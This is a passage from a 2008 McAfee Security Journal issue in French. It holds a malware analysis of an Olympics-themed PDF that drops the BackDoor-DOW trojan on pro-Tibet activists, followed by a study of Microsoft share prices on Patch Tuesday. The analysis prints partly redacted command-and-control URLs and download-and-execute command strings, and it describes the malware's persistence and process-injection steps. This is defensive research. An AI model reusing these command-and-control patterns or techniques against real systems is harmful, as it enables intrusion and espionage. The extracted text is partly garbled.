t Programmes politiques, y compris demandes de don pour un
parti ou un candidat populaire

16 McAFEE SECURITY JOURNAL


Pourquoi les Jeux Olympiques ?
Depuis des mois, la Chine est sous les projecteurs en raison
des Jeux Olympiques 2008 de Pékin. Athlètes, supporters,
infrastructure, environnement et politique, entre autres, ont été Le choix des Jeux Olympiques comme thème
longtemps au centre de l'actualité.
d'attaque d'ingénierie sociale a permis aux
Sur le front politique, les protestations en faveur du Tibet
auteurs de logiciels malveillants de prendre pour
ont constitué un sujet extrêmement sensible. De nombreuses
organisations opposées à l'occupation chinoise du Tibet ont cible de nombreux passionnés de sports ainsi que
bénéficié de la couverture médiatique des Jeux Olympiques.
les personnes précédemment visées en raison de
D'autres questions touchant au travail forcé et aux droits de
l'homme ont également été largement débattues sur la place leur intérêt dans le conflit sino-tibétain.
publique. Cette actualité brûlante a motivé de nombreux
internautes à lire la presse en ligne.
Dans la période précédant les Jeux, la flamme olympique est
devenue un symbole important dans les manifestations de A ce stade, le public visé par l'attaque s'est élargi. Initialement
protestation. Le parcours de la flamme a été largement couvert dirigée contre des organisations ciblées et leurs sympathisants,
par les médias et suscité de vives réactions parmi ses partisans l'attaque s'est étendue à tous les internautes intéressés par la
et opposants. Un tel intérêt constitue évidemment une aubaine situation tibétaine. Une fois encore, l'attention des médias a
pour les auteurs de logiciels malveillants, puisqu'il accroît le contribué à élargir la population de victimes potentielles.
nombre de victimes potentielles attirées par le sujet.
Ensuite, les auteurs de logiciels malveillants ont exploité les Jeux
Olympiques eux-mêmes pour lancer des attaques d'ingénierie
Echantillonnage des victimes sociale sous la forme du rootkit pro-Tibet2. Cette série de fichiers
malveillants se dissimulait derrière une vidéo tournant en ridicule
Une attaque d'ingénierie sociale doit généralement
un gymnaste chinois. Pendant l'exécution du dessin animé,
« échantillonner » au préalable ses victimes pour réussir. Examinons
plusieurs fichiers malveillants étaient silencieusement injectés et
à présent les victimes potentielles d'une attaque utilisant le conflit
un rootkit installé sur l'ordinateur cible afin de les dissimuler.
sino-tibétain ou les Jeux Olympiques comme appât.
Le choix des Jeux Olympiques comme thème d'attaque
Des militants appartenant à des groupes protibétains ont
d'ingénierie sociale a permis aux auteurs de logiciels malveillants
reçu des e-mails contenant une pièce jointe au format CHM
de prendre pour cible de nombreux passionnés de sports ainsi
(fichier d'aide compilé), PDF, PPT, XLS ou DOC traitant de la
que les personnes précédemment visées en raison de leur intérêt
situation au Tibet, de la Chine en général ou des Jeux. Tous ces
dans le conflit sino-tibétain.
messages semblaient avoir été envoyés par une personne ou une
organisation digne de confiance. Selon toute vraisemblance, ces
utilisateurs étaient habitués à recevoir des documents de ce type
de leurs partisans et ne s'en sont pas toujours méfiés. Il s'agissait
de pièces jointes malveillantes : leurs auteurs utilisaient diverses
vulnérabilités associées aux fichiers d'aide compilés HTML de
Microsoft, Adobe Acrobat, Microsoft Excel, Microsoft PowerPoint
ou Microsoft Word pour injecter et exécuter silencieusement
des fichiers exécutables incorporés. A ce stade, le public cible
était relativement restreint, mais la couverture médiatique des
manifestations en faveur du Tibet a servi de détonateur.
Par la suite, certains sites web légitimes de défense de la cause
tibétaine ont été piratés afin d'incorporer le cheval de Troie
Fribet1, qui peut se télécharger sur les ordinateurs des visiteurs en
exploitant des vulnérabilités des navigateurs web.

AUTOMNE 2008 17
Etude de cas : attaque de logiciel actifs, localise le répertoire d'installation d'Acrobat puis ouvre
le fichier book.pdf. La figure 4 (page suivante) montre le code
malveillant sur fond de Jeux Olympiques contenu dans le fichier injecteur responsable de l'action.
Nous avons récemment reçu le fichier PDF, declaration_olympic_ Le logiciel malveillant injecte également un autre fichier
games_eng.pdf, envoyé initialement à un groupe pro-tibétain exécutable, book.exe, qui se copie sous %ALLUSERSPROFILE%\
(voir figure 1). Ce document semblait inoffensif dans la mesure Application Data\msmsgs.exe et crée un nouveau service
où, à l'ouverture de l'application, le texte apparaissait sans bloquer Windows4. Ce nouveau service porte le nom de « Logical Disk
l'application ni provoquer d'événements inhabituels. La plupart Manager Service » (Service du gestionnaire de disques logiques)
des utilisateurs n'ont dès lors pas suspecté la présence d'une et garantit l'exécution automatique du cheval de Troie au
quelconque activité malveillante. Toutefois, en arrière-plan, certains démarrage de Windows.
fichiers malveillants étaient silencieusement créés sur les ordinateurs
des victimes. Examinons à présent le fonctionnement de l'attaque. Le logiciel malveillant dispose même d'un « plan de secours »
pour intercepter le processus de démarrage : s'il n'arrive pas
En fait, le fichier declaration_olympic_games_eng.pdf est un à créer le service, il ajoute une nouvelle entrée de Registre,
fichier PDF vide qui exploite une vulnérabilité d'Acrobat pour Windows Media Player, qui pointe vers msmsgs.exe. Windows
injecter et exécuter la première partie d'un package malveillant. Media Player est ajouté à la clé de démarrage suivante dans
Ce fichier exécutable malveillant (détecté sous le nom de le Registre5 : HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\
BackDoor-DOW3) est incorporé sous une forme chiffrée à Windows\CurrentVersion\Run. Le cheval de Troie crée également
l'emplacement illustré dans l'éditeur hexadécimal de la deux fichiers contenant certaines données chiffrées :
figure 2 (page suivante).
t C:\WINDOWS\jwiev.log.bak
La figure 3 (page suivante) montre les premiers octets du fichier
incorporé après qu'il a été déchiffré.
t C:\WINDOWS\clocks.avi.bak

Le fichier exécutable dépose le fichier PDF légitime, book.pdf, qui


s'affiche lors de l'exécution du premier fichier. Le fichier injecteur
recherche le processus AcroRd32.exe dans la liste des processus

Figure 1 : Les sympathisants de


la cause tibétaine ont récemment
Sponsor's declaration of responsibility
reçu ce fichier en apparence
at the 2008 Beijing Olympic Games
légitime sous la forme d'une
WITH REFERENCE TO, and consistent with, our obligations under the Olympic Charter, pièce jointe à un e-mail.
the undersigned sponsor of the 2008 Beijing Olympic Games hereby declares:
:HUHDI¿UPRXUFRPPLWPHQWWRWKH³KDUPRQLRXVGHYHORSPHQWRIPDQZLWKDYLHZWR
SURPRWLQJDSHDFHIXOVRFLHW\FRQFHUQHGZLWKWKHSUHVHUYDWLRQRIKXPDQGLJQLW\´DVVHW
forth in the Olympic Charter, and
We acknowledge that sponsorship of the Olympic Games carries certain responsibilities,
including the responsibility of implementing our sponsorship and communications
programs in a manner that promotes awareness of basic human rights such as the
right to free speech, and
:HDUHIXOO\DZDUHRIWKHDVVXUDQFHPDGHE\WKHJRYHUQPHQWRIWKH3HRSOH
V5HSXEOLF
RI&KLQDWRWKH2O\PSLF&RPPLWWHHWRLPSURYHLWVKXPDQULJKWVUHFRUGDVDFRQGLWLRQ
for hosting the Olympic Games and recognize the worldwid concerns expressed about
&KLQD
VKXPDQULJKWVUHFRUG
IN FURTHERANCE TO THE ABOVE, we agree to demonstrate our commitment to
human rights at the 2008 Beijing Olympics by:
),567PDNLQJERQD¿GHJRRGIDLWKHIIRUWVWRUDLVHWKHLVVXHRIKXPDQULJKWVZLWKRXU
Chinese contacts and to publicly report on our efforts to do so, and
6(&21'GHVLJQDWLQJDKLJKOHYHOH[HFXWLYHZLWKLQRXURUJDQL]DWLRQWRPRQLWRUHYHU\
DVSHFW RI RXU DFWLYLWLHV DVVRFLDWHG ZLWK WKH 2O\PSLFV DQG WR DVVXUH WKDW RXU DFWLRQV
SURSHUO\UHÀHFWRXUFRPPLWPHQWWRKXPDQGLJQLW\DQGKXPDQULJKWVDQG
THIRD, establishing a fund through which contributions can be made to prisoners of
conscience in China, and their families, as well as to those persecuted in connection
with the 2008 Olympic Games, and
)2857+SUHVHQWLQJDFRUSRUDWHUHVROXWLRQWRRXU%RDUGRI'LUHFWRUVUHVROYLQJWRDGRSW
this Declaration, and the principles of human rights and human dignity upon which it is
based, prior to the commencemento of the 2008 Olympic Games in Beijing, and
),)7+LQFRUSRUDWLQJWKLV'HFODUDWLRQRI5HVSRQVLELOLW\LQWRRXUFRPPHUFLDOPHVVDJHV
DECLARED BY

Name/Title
Date

18 McAFEE SECURITY JOURNAL


Pour terminer, book.exe effectue un nettoyage en créant Le code malveillant injecté dans svchost.exe appelle la fonction
un fichier de commandes qui se supprime et s'arrête workFunc() à partir du fichier avp01.lic, laquelle se connecte à un
automatiquement. A ce stade, c'est le fichier msmsgs.exe qui serveur distant et envoie trois requêtes :
prend les commandes. t http://www1.palms[supprimé]/ld/v2/loginv2.asp?hi=2wsdf351&x
Msmsgs.exe injecte temporairement un autre fichier à =0720080510150323662070000000&y=192.168.1.122&t1=ne
l'emplacement suivant : C:\Program Files\WindowsUpdate\ t http://www1.palms[supprimé]/ld/v2/votev2.asp?a=7351ws2&s
Windows Installer.exe. Juste avant d'être supprimé, Windows =0720080510150323662070000000&t1=ne
Installer.exe injecte deux copies d'un fichier DLL dans :
t http://www1.palms[supprimé]/ld/v2/logoutv2.asp?p=s9wlf1&s=
t C:\Documents and Settings\All Users\DRM\drmv021.lic
0720080510150323662070000000&t1=ne
t C:\Documents and Settings\All Users\DRM\avp01.lic
Les paramètres x et y peuvent varier. La valeur de x est obtenue
Le logiciel malveillant s'injecte dans svchost.exe pour dissimuler en concaténant « 07 » ainsi que la date (10/05/2008) et l'heure
son activité. Il exécute une nouvelle instance de svchost.exe (le (15:03:23) exactes de création du fichier clocks.avi.bak puis en
processus système légitime6), alloue un bloc de mémoire dans ajoutant la chaîne codée en dur « 662070000000 ». La valeur de
l'espace d'adressage de ce nouveau processus, écrit une copie y est l'adresse IP de l'ordinateur de la victime.
de lui-même dans l'espace d'adressage virtuel de svchost.exe (à
l'adresse 0x400000), et exécute le code malveillant en créant
une thread distante.

Figure 2 : Ce fichier PDF malveillant contenait une copie chiffrée du


logiciel malveillant BackDoor-DOW.

Figure 4 : Le logiciel malveillant recherche Acrobat Reader


(AcroRd32.exe) puis ouvre le fichier innocent book.pdf.

Figure 3 : Version déchiffrée du cheval de Troie BackDoor-DOW.

AUTOMNE 2008 19
Cette tendance risque de prendre de
Les trois scripts côté serveur loginv2.asp, votev2.asp et l'ampleur au cours des mois à venir.
logoutv2.asp informent l'auteur de l'attaque qu'un nouvel
Elle est inquiétante car la plupart
ordinateur compromis est disponible afin de vérifier si
une commande a été envoyée par le pirate ou d'arrêter le des internautes font confiance aux
composant Backdoor. Pour lire la réponse envoyée après la éditeurs de logiciels de sécurité. Si cette
connexion à l'un des scripts côté serveur, le cheval de Troie crée confiance était entamée, les dommages
une copie de la page web renvoyée dans le dossier suivant :
C:\Program Files\InstallShield Installation Information\ seraient sans doute encore plus graves.
Le nom du fichier représente une valeur aléatoire de six
chiffres et, une fois lu, le fichier est supprimé. loginv2.asp et
logoutv2.asp renvoient uniquement des pages web vides (avec
des balises <html><head></head></html>). En revanche,
votev2.asp renvoie soit du code signifiant approximativement
Sites et logiciels malveillants
« Le composant backdoor est prêt mais aucune action n'est Les accroches dont usent les auteurs d'attaques d'ingénierie
nécessaire pour le moment » (@n4@300@), soit une commande sociale ne se limitent pas aux événements sportifs. Depuis plusieurs
similaire aux exemples suivants : mois, nous avons pu constater une augmentation des logiciels
malveillants prétendument développés par des éditeurs de logiciels
t @n11@http://www1.palms[supprimé]/ld/v2/sy64.
de sécurité. Ces programmes trompent les victimes en prétendant
jpg@%SystemRoot%\Dnservice.exe@218c663bea3723a3dc9d
les aider. Comble de l'ironie, plusieurs variantes du cheval de Troie
302f7a58aeb1@
FakeAlert7 avertissent les victimes que leur ordinateur a été infecté
t @n11@http://www1.palms[supprimé]/ld/v2/200764.jpg @% et communiquent des informations (souvent des URL malveillantes)
SystemRoot%\Soundmax.exe@5f3c02fd4264f3eaf3ceebfe94f permettant de télécharger des outils « antispyware » qui sont en
fd48c@. réalité des applications malveillantes.
Les deux commandes signifient approximativement « télécharger Etant donné l'importance que revêtent les mises à jour des
le fichier susmentionné avec l'extension .JPG et l'injecter dans le logiciels, il n'a pas fallu longtemps pour que des sites web
dossier %SysDir% de l'ordinateur de la victime à l'aide du nom malveillants commencent à imiter le site Windows Update légitime.
du fichier exécutable fourni ». La dernière partie de la réponse est Une méthode très élaborée utilisant des composants DLL a été
le hachage md5 du fichier en passe d'être téléchargé (et utilisé récemment découverte. Liée à un pseudo-site Windows Update,
pour contrôler l'intégrité du fichier). elle empêchait Internet Explorer d'avertir les utilisateurs lorsqu'un
Tout au long du processus, les victimes ne se doutent pas un seul serveur web distant utilisait un certificat non valide pour un site
instant de ce qui se passe en arrière-plan. Pendant qu'ils lisent et web sécurisé (HTTPS). Cette attaque avait pour but de dissimuler
complètent la déclaration envoyée par le fichier PDF malveillant, des fichiers malveillants sous le couvert de mises à jour Windows
le composant backdoor est installé silencieusement sur leur qui étaient téléchargées et exécutées par les victimes.
ordinateur, dans l'attente des commandes qui seront envoyées Cette tendance risque de prendre de l'ampleur au cours des mois
par le pirate. A ce stade, il est possible de télécharger n'importe à venir. Elle est inquiétante car la plupart des internautes font
quel autre fichier malveillant sur l'ordinateur, dans la mesure où il confiance aux éditeurs de logiciels de sécurité. Si cette confiance
est entièrement compromis. était entamée, les dommages seraient sans doute encore plus graves.

20 McAFEE SECURITY JOURNAL


Conclusion
Les événements sportifs sont souvent utilisés comme appâts Ces attaques sont tellement évoluées que les victimes n'ont
dans les attaques d'ingénierie sociale. Il était dès lors prévisible pratiquement jamais aucun soupçon. Comme l'a montré cette
que les développeurs de logiciels malveillants s'intéressent aux étude de cas, nous sommes confrontés à des menaces émanant non
Jeux Olympiques de Pékin. Cet événement réunissait tous les seulement d'expéditeurs inconnus et de pièces jointes dotées d'une
ingrédients nécessaires à leur succès : des petites attaques ciblées extension .EXE, mais aussi de documents légitimes (Microsoft Word,
ont pris de l'ampleur à mesure qu'augmentait le nombre de Microsoft Excel, Microsoft PowerPoint, etc.) qui peuvent également
victimes potentielles intéressées par le sujet. L'expansion a été héberger un composant malveillant. Le succès de ces attaques est
facilitée par les questions connexes : le problème du Tibet a dû en partie à Ia conception erronée voulant que les fichiers de
conduit au relais de la flamme qui a, à son tour, mené aux Jeux données ne peuvent pas contenir de logiciels malveillants.
eux-mêmes. Les médias jouent souvent un rôle majeur dans la
popularité d'un événement. La couverture médiatique importante Certes, les internautes sont généralement plus conscients et
incite certaines victimes à aller au-devant de l'information ; ce mieux informés des ruses habituelles des pirates. Ces derniers se
faisant, elles tombent sur des sites web malveillants ou, plus trouvent ainsi contraints à se tourner vers des techniques plus
fréquemment, des sites web légitimes compromis qui infectent créatives et plus délétères pour réussir à tromper leurs victimes.
silencieusement leurs visiteurs peu méfiants.

Elodie Grandjean travaille comme chercheur pour


McAfee Avert Labs en France depuis janvier 2005.
Elle possède plus de cinq années d'expérience
dans le domaine de l'ingénierie inverse sur les
plates-formes Windows. Spécialisée dans les
techniques de protection contre l'ingénierie inverse,
la décompression et le déchiffrement, Elodie
Grandjean a également écrit pour le magazine
français de sécurité informatique MISC (Multi-
System & Internet Security Cookbook). Lorsqu'elle
ne se consacre pas à l'analyse des logiciels
malveillants ou à la programmation, elle surfe sur
Internet, ou elle aime assister à des concerts ou
savourer une bière belge entre amis.

NOTES
1 Fribet, McAfee VIL — http://vil.nai.com/vil/content/v_144356.htm 7 FakeAlert-B, McAfee VIL — http://vil.nai.com/vil/content/v_139058.htm
2 « Is Malware Writing the Next Olympic Event? » (Le développement de logiciels FakeAlert-C — http://vil.nai.com/vil/content/v_139219.htm
malveillants est-il le prochain événement olympique ?) Blog McAfee Avert Labs FakeAlert-D — http://vil.nai.com/vil/content/v_140346.htm
— http://www.avertlabs.com/research/blog/index.php/2008/04/14/ FakeAlert-D!56c05f7f — http://vil.nai.com/vil/content/v_142850.htm
is-malware-writing-the-next-olympic-event/ FakeAlert-H — http://vil.nai.com/vil/content/v_141377.htm
3 « BackDoor-DOW », McAfee VIL — http://vil.nai.com/vil/content/v_144476.htm FakeAlert-I — http://vil.nai.com/vil/content/v_141466.htm
4 « Services », Microsoft Developer Network — http://msdn.microsoft.com/en-us/ FakeAlert-G — http://vil.nai.com/vil/content/v_141163.htm
library/ms685141(VS.85).aspx FakeAlert-M — http://vil.nai.com/vil/content/v_142807.htm
5 « Registre », Microsoft Developer Network — http://msdn.microsoft.com/en-us/ FakeAlert-Q — http://vil.nai.com/vil/content/v_143088.htm
library/ms724871(VS.85).aspx FakeAlert-R — http://vil.nai.com/vil/content/v_143102.htm
6 « Description de Svchost.exe dans Windows XP », Microsoft Help and Support FakeAlert-S.dll — http://vil.nai.com/vil/content/v_143110.htm
— http://support.microsoft.com/kb/314056/en-us FakeAlert-T — http://vil.nai.com/vil/content/v_143406.htm
Generic FakeAlert.a — http://vil.nai.com/vil/content/v_143470.htm

AUTOMNE 2008 21
Les vulnérabilités des
marchés boursiers
Anthony Bettini

La récente crise des crédits qui a secoué les marchés des actions et des produits dérivés a
attiré l'attention sur les nombreuses facettes du secteur financier autres que les structures
de contrôle réglementaire, les agences de notation financière, les fonds spéculatifs, le
capital d'investissement, les fonds de pension et d'autres teneurs de marché.

En raison de cette attention médiatique constante, les spécialistes Comme il s'agit d'un sujet d'étude très large, commençons par
des sciences connexes (informatique, bioinformatique, etc.) analyser uniquement les vulnérabilités des produits Microsoft. Dans
commencent à s'intéresser de plus près à l'ingénierie financière. un proche avenir, nous prévoyons de compléter nos recherches
en y incluant des données relatives à d'autres éditeurs de logiciels,
Etant donné notre expérience dans le domaine de la recherche ainsi qu'une étude comparative sur l'impact économique des
de vulnérabilités et le battage médiatique autour de la crise des méthodes de distribution de correctifs (par exemple la publication
crédits, il est normal de se pencher sur les vulnérabilités des mensuelle de Microsoft, la publication trimestrielle d'Oracle et les
marchés des actions et des produits dérivés. Lors de la conférence publications en fonction des besoins d'autres éditeurs).
Black Hat 2007 aux Etats-Unis, Matasano Security s'est intéressé
au protocole FIX (Financial Information eXchange), sur lequel
repose le transfert des messages entre les gestionnaires de L'hypothèse
portefeuille exécutant des ordres pour le compte de leurs clients et Le jour de diffusion des correctifs mensuels est le deuxième mardi
les opérateurs en bourse1,2. Les recherches de Matasano portent de chaque mois (d'où le surnom de « Patch Tuesday »). C'est le
sur diverses questions dont les éventuelles vulnérabilités du seul jour du mois où Microsoft publie principalement les mises
protocole FIX. S'il s'agit d'une approche intéressante sur les points à jour fonctionnelles et les mises à jour de sécurité de Windows
faibles des protocoles financiers en termes de sécurité, notre article et de ses autres applications. Selon notre hypothèse, en ce jour
adopte, quant à lui, une démarche différente. Il s'attache plutôt à précis, il existe une pression à la baisse sur l'action Microsoft
l'aspect financier et à l'ingénierie sociale qu'aux vulnérabilités. (sigle de l'action : MSFT). Cette pression est vraisemblablement
due à des communiqués de presse concernant les répercussions
Notre recherche s'intéresse aux questions suivantes :
négatives des vulnérabilités de sécurité présentes dans les
t Quelles sont les implications sur le cours de l'action de la logiciels Microsoft. De la même façon, le cours a tendance à
publication mensuelle des correctifs Microsoft (Patch Tuesday) ? remonter le lendemain, le mercredi, lorsque les investisseurs
réalisent que l'action a été survendue la veille.
t Qu'en est-il du jour qui précède cette publication ?
t Et du jour qui suit celle-ci (parfois désigné en anglais par le Le jour de diffusion des correctifs fait-il l'objet d'une
terme « Exploit Wednesday ») ? certaine forme de spéculation ?
t Que se passe-t-il le jour de la publication des bulletins Tout porte à le croire. En tout cas, il semble y avoir une
Microsoft Security Bulletin Advance Notification ? corrélation entre les fluctuations du cours de l'action et le cycle
de distribution des correctifs. A titre d'exemple, reportons-nous à
t Qu'en est-il des menaces émergentes ?
la figure 1 (page suivante).
t Les investisseurs sont-ils même conscients de ces événements ?
La première ligne, « Moyenne de l'année », représente notre
t Existe-t-il actuellement des événements d'ingénierie sociale moyenne de référence de la différence entre le cours de l'action
liés aux vulnérabilités et aux marchés des actions ? Des Microsoft à l'ouverture des marchés, et ce cours à la clôture. La
événements de ce type pourraient-ils se multiplier à l'avenir ? figure inclut une autre base de référence, à savoir la moyenne

22 McAFEE SECURITY JOURNAL


des « jours sans événements », qui exclut donc des événements entre le cours à l'ouverture et le cours le plus bas — même si,
tels que les jours de publication des correctifs mensuels et des dans certains cas, elle est moins marquée.
bulletins de notification avancée. Il semble que, lorsque Microsoft La figure 2 montre qu'en général, les cours moyens intrajournaliers
publie un bulletin Security Bulletin Advance Notification, le les plus élevés observés les jours de notification avancée et les
cours connaît en moyenne une tendance à la baisse plus forte jours de publication des correctifs mensuels sont plus bas que le
que d'habitude. De même, le jour de publication des correctifs cours moyen intrajournalier le plus élevé pour l'année. En outre,
mensuels enregistre également une tendance à la baisse plus le cours moyen le plus élevé intrajournalier le lendemain de la
marquée. Plus intéressant, le mercredi qui suit Patch Tuesday publication mensuelle des correctifs est généralement plus élevé,
(également appelé « Exploit Wednesday »), la tendance est ce qui indique une pression à la hausse plus élevée.
généralement haussière ou en tout cas positive à la clôture.
Cela s'explique probablement par le fait que les investisseurs La figure 3 nous apprend qu'en général, le cours moyen
institutionnels ou les teneurs de marché estiment que l'action intrajournalier le plus bas observé le jour de publication des
a été survendue la veille en raison de mauvaises nouvelles alors correctifs est plus bas que le cours moyen intrajournalier le
qu'en réalité, l'impact est négligeable sur la valeur de Microsoft plus bas pour toute l'année. En revanche, en ce qui concerne
en tant qu'investissement. Notez que cette tendance se vérifie le jour de publication des bulletins de notification avancée, les
régulièrement ces trois dernières années et toujours maintenant. résultats sont plus mitigés. Il faut également noter que le cours
Bien que la fluctuation du cours entre l'ouverture et la clôture moyen intrajournalier le plus bas du jour qui suit Patch Tuesday
soit la plus facile à comprendre, il est possible de noter cette est généralement plus élevé que la moyenne de l'année, ce qui
même tendance dans la moyenne entre le cours à l'ouverture et indique une pression à la hausse plus élevée.
le cours le plus élevé (cours du jour) et aussi dans la moyenne

Fluctuation du cours de l'action Microsoft entre l'ouverture et la clôture Fluctuation de l'action Microsoft entre le cours d'ouverture et le cours
intrajournalier le plus bas
FLUCTUATION DU COURS DE L'ACTION FLUCTUATION DU COURS DE L'ACTION
MSFT ENTRE L'OUVERTURE ET LA 2008 2007 2006 MSFT ENTRE L'OUVERTURE ET 2008 2007 2006
CLÔTURE DES MARCHÉS LE COURS LE PLUS BAS
Moyenne de l'année -0,17 % 0,06 % 0,08 % Moyenne de l'année -1,35 % -0,89 % -0,64 %
Jours sans événements -0,20 % 0,07 % 0,08 % Jours sans événements -1,39 % -0,90 % -0,64 %
Publication des bulletins Microsoft
-0,43 % -0,12 % -0,08 % Publication des bulletins Microsoft -1,24 % -1,24 % -0,36 %
Security Bulletin Advance Notification
Security Bulletin Advance Notification
Jour de publication des correctifs Jour de publication des correctifs
-0,45 % -0,29 % -0,11 % -1,58 % -0,99 % -0,93 %
mensuels (Patch Tuesday) mensuels (Patch Tuesday)
Tous les mardis 0,16 % 0,05 % -0,03 % Tous les mardis -1,16 % -0,81 % -0,74 %

Tous les mardis sauf Patch Tuesday 0,37 % 0,15 % -0,01 % Tous les mardis sauf Patch Tuesday -1,01 % -0,76 % -0,68 %

Jour suivant Patch Tuesday 0,49 % 0,21 % 0,27 % Jour suivant Patch Tuesday -0,91 % -0,74 % -0,47 %
Tous les mercredis -0,18 % 0,44 % 0,29 % Tous les mercredis -1,39 % -0,78 % -0,51 %
Mercredi sauf celui qui suit Mercredi sauf celui qui suit
-0,40 % 0,51 % 0,26 % -1,56 % -0,79 % -0,54 %
Patch Tuesday Patch Tuesday

Figure 1 : L'analyse de la fluctuation du cours de l'action Microsoft les jours clés Figure 3 : Le jour de publication des correctifs mensuels conserve sa position de cours
montre une tendance régulière sur trois ans. le plus bas par rapport au cours intrajournalier moyen le plus bas de l'année.

Fluctuation de l'action Microsoft entre le cours d'ouverture et le cours


intrajournalier le plus élevé
FLUCTUATION DU COURS DE L'ACTION
MSFT ENTRE L'OUVERTURE ET 2008 2007 2006
LE COURS LE PLUS HAUT
Moyenne de l'année 1,28 % 0,97 % 0,88 %
Jours sans événements 1,34 % 0,95 % 0,88 %
Publication des bulletins Microsoft
Security Bulletin Advance Notification 0,93 % 1,08 % 0,58 %
Jour de publication des correctifs
mensuels (Patch Tuesday) 0,92 % 0,98 % 0,67 %

Tous les mardis 1,35 % 1,01 % 0,92 %


Tous les mardis sauf Patch Tuesday 1,50 % 1,02 % 0,99 %
Jour suivant Patch Tuesday 1,52 % 1,30 % 0,70 %
Tous les mercredis 1,25 % 1,24 % 0,92 %
Mercredi sauf celui qui suit
1,17 % 1,23 % 0,95 %
Patch Tuesday

Figure 2 : Dans les transactions intrajournalières, les jours de notification avancée et les
jours de publication des correctifs mensuels de Microsoft affichent systématiquement des
moyennes de cours de l'action moins élevées que les autres jours de l'année.
AUTOMNE 2008 23
Avant de poursuivre, un conseil de prudence à l'intention du Sachant qu'à l'heure actuelle, de fausses rumeurs et divulgations
spéculateur sur séance occasionnel ou du petit investisseur : ces de vulnérabilités circulent déjà via des listes de diffusion telles
fluctuations du cours sont relativement faibles et très limitées que Full Disclosure ou dans les salles de chat IRC, on peut
dans le temps. Avec un tel profil d'investissement, réaliser un envisager la possibilité d'orchestrer des événements de ce type
bénéfice exigerait un gros investissement important et assez grâce à l'ingénierie sociale dans le but de manipuler le marché
risqué en capital. Qui plus est, l'ensemble de données illustré et ses acteurs. Un tel scénario serait évidemment illégal, mais
ici est relativement restreint et donc inévitablement peu fiable. certains font peu de cas de la loi lorsqu'il y a l'espoir d'un profit
Par exemple, une année compte environ 260 jours d'ouverture à la clé. Par ailleurs, comme nous le verrons plus tard, toutes les
des marchés, dont douze seulement correspondent aux jours de attaques n'auraient pas nécessairement recours à l'ingénierie
publication des correctifs mensuels. Néanmoins, en dépit d'un sociale. Certaines peuvent même être légales.
ensemble de données et de fluctuations limités, ce niveau de
En tenant compte de l'hypothèse d'efficience des marchés
corrélation peut s'avérer utile pour les investisseurs institutionnels,
(EMH, Efficient Market Hypothesis) et de l'hypothèse de marche
même s'il doit être modélisé de la façon adéquate.
aléatoire (RWH, Random Walk Hypothesis), il semble peu
Examinons à présent les chiffres comparatifs des écarts de plus- probable qu'il existe des scénarios de plus-value basés sur des
value potentiels de la figure 4. prévisions à court terme du marché, et en tout cas qu'ils se
Elle montre qu'il semble possible de réaliser une petite plus-value reproduisent régulièrement3,4. A cet égard, il convient d'attirer
l'attention des lecteurs sur le fait que « les performances passées
en achetant des actions lorsque le cours s'approche de sa valeur
ne laissent rien présumer des performances futures5.
moyenne intrajournalière la plus basse le jour de la publication
des correctifs mensuels, et en les vendant le jour suivant, lorsque
la valeur de l'action correspond à la moyenne intrajournalière la Rôle du volume des actions en tant qu'indicateur
plus élevée. (L'effet serait naturellement atténué si cette pratique Dans une autre théorie, nous soutenions que le cycle des jours
devait se généraliser.) de publication des correctifs mensuels avait atténué l'impact
Les écarts de plus-value illustrés ici sont basés sur de véritables qu'une presse négative pouvait avoir à l'époque où la diffusion
divulgations de vulnérabilités et sur l'hypothèse que les gens des bulletins de sécurité n'était pas planifiée (avant la mi-
réagissent de façon prévisible à de tels événements. De la même octobre 2003). Un rapide coup d'œil à l'indicateur du volume
façon que des rumeurs d'une OPA hostile peuvent se répercuter d'actions semblent étayer cette théorie. (Reportez-vous à la
sur le cours d'une action, des rumeurs concernant plusieurs figure 5 pour plus de détails.)
failles de sécurité graves et dangereuses pour les utilisateurs
risquent d'avoir le même effet.

Ecarts de plus-value potentiels

ÉCARTS 2008 2007 2006

Cours intra- Cours intra- Cours intra- Cours intra- Cours intra- Cours intra-
journalier journalier journalier journalier journalier journalier
le plus bas le plus haut le plus bas le plus haut le plus bas le plus haut
Entre le cours intrajournalier le plus bas de l'année
-1,35 % 1,28 % -0,89 % 0,97 % -0,64 % 0,88 %
et le cours intrajournalier le plus haut de l'année
Entre le cours intrajournalier le plus bas d'un jour Figure 4 : L'achat d'actions le
de publication des correctifs mensuels (Patch jour de publication des correctifs
Tuesday) et le cours journalier le plus haut -1,58 % 0,92 % -0,99 % 0,98 % -0,93 % 0,67 %
mensuels et leur vente le
d'un même jour
lendemain permet de réaliser un
Entre le cours intrajournalier le plus bas d'un jour de gain légitime, mais uniquement
publication des correctifs mensuels (Patch Tuesday) -1,58 % 1,52 % -0,99 % 1,30 % -0,93 % 0,70 % sur de gros volumes d'actions et
et le cours journalier le plus haut du jour suivant
avec un risque considérable.

24 McAFEE SECURITY JOURNAL


Volume de transactions sur l'action Microsoft, 2002– 2003

ÉCARTS DE VOLUME D'ACTIONS MSFT ECHANGÉES (PUBLICATIONS NON PLANIFIÉES) 2003 2002

Volume moyen, année complète (en actions échangées par jour) 65 074 644 76 903 678

Volume moyen, année complète (jours sans événements) 64 512 432 76 503 325
Figure 5 : Volume de
Volume moyen, jour d'un bulletin non planifié 70 017 743 78 796 255
transactions liées à l'action
Différence moyenne en volume 7,60 % 2,46 % Microsoft avant le passage à
la publication planifiée des
Ecart moyen en volume par rapport aux jours sans événements 8,53 % 3,00 %
correctifs mensuels

Jours de publication de correctifs mensuels

ÉCARTS DE VOLUME D'ACTIONS MSFT ECHANGÉES


(PUBLICATIONS PLANIFIÉES) 2008 2007 2006 2005 2004

Volume moyen, année complète 84 898 274 62 506 437 67 074 387 66 612 503 66 793 733

Volume moyen, année complète


86 738 696 64 210 868 68 753 419 67 227 483 67 260 018
(jours sans événements)
Volume moyen, jour de publication de correctifs
75 584 620 57 840 233 63 786 108 65 453 142 65 439 875
mensuels (Patch Tuesday)
Volume moyen, un mardi autre que
Patch Tuesday 79 818 571 59 305 574 64 967 877 69 691 473 66 471 610

Ecart moyen en volume d'actions MSFT échangées


(entre Patch Tuesday et l'année complète) -10,97 % -7,47 % -4,90 % -1,74 % -2,03 %

Ecart moyen en volume d'actions MSFT échangées


(entre Patch Tuesday et les jours sans événements) -12,86 % -9,92 % -7,22 % -2,64 % -2,71 %

Volume moyen pour l'indice ^IXIC


année complète 2 249 267 340 2 089 534 502 1 926 859 522 1 731 835 794 1 769 480 040

Volume moyen pour l'indice ^IXIC,


année complète (jours sans événements) 2 271 900 270 2 094 466 552 1 935 854 692 1 732 949 769 1 768 463 981

